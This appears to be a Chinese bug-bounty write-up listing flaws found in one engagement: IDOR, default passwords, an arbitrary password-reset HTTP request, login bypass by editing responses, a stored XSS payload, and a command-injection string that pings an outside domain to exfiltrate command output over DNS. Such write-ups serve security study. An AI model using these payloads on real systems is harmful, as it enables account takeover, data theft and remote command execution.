一次众测的项目,把里面的漏洞都拿部分出来水一下
这次项目是给的固定资产,信息收集也做得很粗糙,基本就是判断存活后,挂上ARL扫一遍后就开始打
越权1


正常情况下是没有内容的,我们抓包后将code改成1可以泄露用户合同、身份证号、手机号、姓名信息


这个也是同理,将code值改为1

越权2
默认口令进入后台后查看电费

正常是看不到的,我们抓包后将查询字段置空

放包后即可查询到数据

任意用户密码修改
进入小程序,使用任意用户(134*2192)登录后,获取认证字段带入以下POC,是个重置密码的路径
PUT /api/system/resetPwd HTTP/1.1
Host: exaplem.com
Connection: close
Authorization: Bearer eyJhbGciOiJIUzUxg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090a13) UnifiedPCWindowsWechat(0xf2541510) XWEB/17071
xweb_xhr: 1
Content-Type: application/json
tenant-id: 1
Accept: */*
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://exaplem.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 47
{"userId":"111","password":"111"}
Id为:88888888,账号为:138*0365。可以看到id为88888888的实则为138*0365的标识,说明我们重置的是138*0365的密码

登录用户:138*0365/2025Seccz_cc 可登录成功
任意用户绑定1
说实话,我感觉危害不大,毕竟是第一次登录绑定的,但为了水文字,我还是决定写出来

一键认证的时候抓包,将phone的号码改一下

然后重新进入小程序,可以看到绑定了其他人的电话号码

你要说这算漏洞吗?我觉得应该算,按照逻辑来说,我们想要绑定别人的phone,是要去收验证码的,但我们可以通过这个一键绑定来绕过收验证码的步骤
默认口令
这个密码的获取来源是通过未授权看到的,所以我们在看数据包的时候一定要仔细耐心一点,说不定就有啥惊喜,比如这次的未授权路径为/prod-api/system/config/2
知道密码我们就可以爆破用户名

存储XSS
这个没什么技巧,就是看到有输入框的地方都尝试以下,这次的payload是 <img src=1 onerror=alert()>


刷新后出现弹窗

越权3
这里是访问申请功能点

正常提交后是待审批状态

我们在编辑时抓包,修改statue为2,代表审批通过

可以看到直接审批通过了

登录绕过
来到登录界面,上面是外来人员登录,下面是本市人员登录

正常我们注册的账号是登不进去的,会显示不是本市人员

抓一下登陆包,修改响应码

将roleTds改为232,roleNames置空

放包后可绕过登录,本市人员可使用功能点

任意用户绑定2
这是某打车软件的跳转功能点

当我们进入后,会自动绑定当前用户的手机号,当我们手动解除绑定后,再想绑定需要手机号的验证码、
以下是解除绑定后再想绑定就会跳转

我们回到原小程序界面,再次点击跳转该打车软件,并抓包


将phone改成我们想绑定的手机号,再次放包可绕过并直接绑定

可以查看该用户的订单详情等
越权4
创建A,B两个账号,保存信息


接着同样保存B的信息,但用户B保存时,将id替换为用户A保存信息对应的id

此时去看A的相关信息

成功被越权修改
继续利用:用户A保存信息并提交审核

用户B保存信息提交审核,同样保存的时候抓包

再次查看用户A提交审核的信息,被成功越权修改

当我们发现一个功能点有问题时,通常其它相同逻辑的功能点也会存在相同问题
比如我们在登录的时候可以通过修改返回状态码来绕过
那么在修改密码的功能点上也极有可能会出现这种漏洞(修改返回状态码绕过),可以用来刷分
命令执行
登录后来到系统诊断

主机ip填127.0.0.1;ping `ls|sed -n '10p'`.dtigjuczrr.lfcx.eu.org;
`ls|sed -n '10p'`是执行命令,打印出当前目录第一个文件的名字,然后通过ping dtigjuczrr.lfcx.eu.org;外带
成功执行并外带


Comments NOTHING